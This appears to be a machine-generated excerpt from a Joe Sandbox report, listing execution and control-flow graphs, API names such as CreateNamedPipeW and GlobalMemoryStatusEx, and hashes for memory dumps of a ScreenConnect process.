                                                                                              • Instruction ID: 5a5323601ed0a0609e24f55ed1d77666b88f70302d5469a7fda7a839d8ba9304
                                                                                              • Opcode Fuzzy Hash: 79968cc527d34301a9e2731a0bdb9c9483763fcbf407e288fabbed7662ace95f
                                                                                              • Instruction Fuzzy Hash: 4E019E30E1AE8E9FEB58EB6880A9AA877B0EF10344F410879D01DD2192CE79BA54C741

                                                                                              Execution Graph

                                                                                              Execution Coverage:11.6%
                                                                                              Dynamic/Decrypted Code Coverage:100%
                                                                                              Signature Coverage:0%
                                                                                              Total number of Nodes:11
                                                                                              Total number of Limit Nodes:1
                                                                                              execution_graph 17158 7ffd9b283662 17159 7ffd9b2a5850 ConnectNamedPipe 17158->17159 17161 7ffd9b2a5902 17159->17161 17162 7ffd9b283642 17163 7ffd9b2a56b0 CreateNamedPipeW 17162->17163 17165 7ffd9b2a57e3 17163->17165 17153 7ffd9b5992c4 17157 7ffd9b5992cd 17153->17157 17154 7ffd9b5993c8 17155 7ffd9b59946c GlobalMemoryStatusEx 17156 7ffd9b599495 17155->17156 17157->17154 17157->17155

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 41 7ffd9b5992c4-7ffd9b5992cb 42 7ffd9b5992d6-7ffd9b59933a 41->42 43 7ffd9b5992cd-7ffd9b5992d5 41->43 47 7ffd9b59933c-7ffd9b599365 42->47 48 7ffd9b599384-7ffd9b59938a 42->48 43->42 49 7ffd9b599367-7ffd9b59936a 47->49 50 7ffd9b5993be 47->50 55 7ffd9b59938e-7ffd9b599397 48->55 52 7ffd9b59936c-7ffd9b59936e 49->52 53 7ffd9b5993eb-7ffd9b5993ef 49->53 54 7ffd9b5993bf 50->54 56 7ffd9b5993ea 52->56 57 7ffd9b599370 52->57 79 7ffd9b5993f0 53->79 58 7ffd9b59943b-7ffd9b59943d 54->58 59 7ffd9b5993c0 54->59 60 7ffd9b599408-7ffd9b599409 55->60 61 7ffd9b599399-7ffd9b59939d 55->61 56->53 66 7ffd9b599372-7ffd9b599374 57->66 67 7ffd9b5993b3 57->67 69 7ffd9b599441-7ffd9b599467 58->69 59->69 70 7ffd9b5993c1 59->70 62 7ffd9b59946c-7ffd9b599493 GlobalMemoryStatusEx 60->62 63 7ffd9b59940b-7ffd9b59941c 60->63 64 7ffd9b59941e-7ffd9b59941f 61->64 65 7ffd9b59939f-7ffd9b5993a1 61->65 83 7ffd9b599495 62->83 84 7ffd9b59949b-7ffd9b5994c2 62->84 72 7ffd9b59941d 63->72 74 7ffd9b599469-7ffd9b59946a 64->74 75 7ffd9b599420-7ffd9b599421 64->75 65->72 73 7ffd9b5993a3-7ffd9b5993a7 65->73 78 7ffd9b599376 66->78 66->79 76 7ffd9b5993b5 67->76 77 7ffd9b59942f-7ffd9b599433 67->77 69->74 81 7ffd9b5993c2-7ffd9b5993c6 70->81 82 7ffd9b599403-7ffd9b599407 70->82 72->64 87 7ffd9b5993a9 73->87 88 7ffd9b599423-7ffd9b599428 73->88 74->62 75->88 89 7ffd9b5993b6-7ffd9b5993b7 76->89 90 7ffd9b5993f7-7ffd9b5993f9 76->90 91 7ffd9b599435-7ffd9b59943a 77->91 85 7ffd9b599378-7ffd9b59937a 78->85 86 7ffd9b5993b9 78->86 81->55 92 7ffd9b5993c8-7ffd9b5993e9 81->92 82->60 83->84 95 7ffd9b5993f6 85->95 96 7ffd9b59937c 85->96 86->91 97 7ffd9b5993bb-7ffd9b5993bd 86->97 87->53 93 7ffd9b5993ab-7ffd9b5993ad 87->93 94 7ffd9b599429-7ffd9b59942e 88->94 89->86 98 7ffd9b5993fb-7ffd9b5993fe 90->98 99 7ffd9b5993ff 90->99 91->58 92->56 93->94 104 7ffd9b5993af-7ffd9b5993b1 93->104 94->77 95->90 96->54 101 7ffd9b59937e-7ffd9b599381 96->101 97->50 98->99 102 7ffd9b599400-7ffd9b599401 99->102 103 7ffd9b599402 99->103 101->102 105 7ffd9b599383 101->105 102->103 103->82 104->67 105->48
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.1909201474.00007FFD9B590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B590000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_7ffd9b590000_ScreenConnect.jbxd
                                                                                              Similarity
                                                                                              • API ID: GlobalMemoryStatus
                                                                                              • String ID:
                                                                                              • API String ID: 1890195054-0
                                                                                              • Opcode ID: c81fda8995368522d76fb97f9a6ecaf0c4523de3053f5833cf9bef438703dd88
                                                                                              • Instruction ID: ce916a54a3ad87df65e735c5e6dd62d351d20b8cc6521454bbdab4fd69c8d270
                                                                                              • Opcode Fuzzy Hash: c81fda8995368522d76fb97f9a6ecaf0c4523de3053f5833cf9bef438703dd88
                                                                                              • Instruction Fuzzy Hash: 1E81053190E68D4FE7B7DBA888296A87BF0FF52310F4541BAC04DC76E7DA58690A8341

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 246 7ffd9b283642-7ffd9b2a571a 249 7ffd9b2a571c-7ffd9b2a5721 246->249 250 7ffd9b2a5724-7ffd9b2a57e1 CreateNamedPipeW 246->250 249->250 252 7ffd9b2a57e9-7ffd9b2a581c 250->252 253 7ffd9b2a57e3 250->253 253->252
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.1903516263.00007FFD9B280000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B280000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_7ffd9b280000_ScreenConnect.jbxd
                                                                                              Similarity
                                                                                              • API ID: CreateNamedPipe
                                                                                              • String ID:
                                                                                              • API String ID: 2489174969-0
                                                                                              • Opcode ID: 48a597d5e098bf3d889fed6c83119fc48d3db705b6e1bb1b841f89c7945a5fb5
                                                                                              • Instruction ID: 4d30dc51863f1a5a7187e793f3e794ec561809e8ad51e5034ebc26549cdd8ea4
                                                                                              • Opcode Fuzzy Hash: 48a597d5e098bf3d889fed6c83119fc48d3db705b6e1bb1b841f89c7945a5fb5
                                                                                              • Instruction Fuzzy Hash: 43519D7191CA1C9FDB68EF589805BE9BBE0FB58720F1042AEE44DE3251CB34A941CBC1

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 255 7ffd9b283662-7ffd9b2a5900 ConnectNamedPipe 259 7ffd9b2a5908-7ffd9b2a594f call 7ffd9b2a5951 255->259 260 7ffd9b2a5902 255->260 260->259
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.1903516263.00007FFD9B280000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B280000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_7ffd9b280000_ScreenConnect.jbxd
                                                                                              Similarity
                                                                                              • API ID: ConnectNamedPipe
                                                                                              • String ID:
                                                                                              • API String ID: 2191148154-0
                                                                                              • Opcode ID: e0f279cac6c73e81f2e244a715beda291f5c0d8a58e931fb7af58a0874a1ffbf
                                                                                              • Instruction ID: f173104bd2040fe497f7a935126cdb2c864e3784d37d5ee4e25ad26f2c0c9e1d
                                                                                              • Opcode Fuzzy Hash: e0f279cac6c73e81f2e244a715beda291f5c0d8a58e931fb7af58a0874a1ffbf
                                                                                              • Instruction Fuzzy Hash: C9315A30E08A1D8FDB58EF98C849BEAB7F1FB58311F00826AD44DD7255CB70A985CB81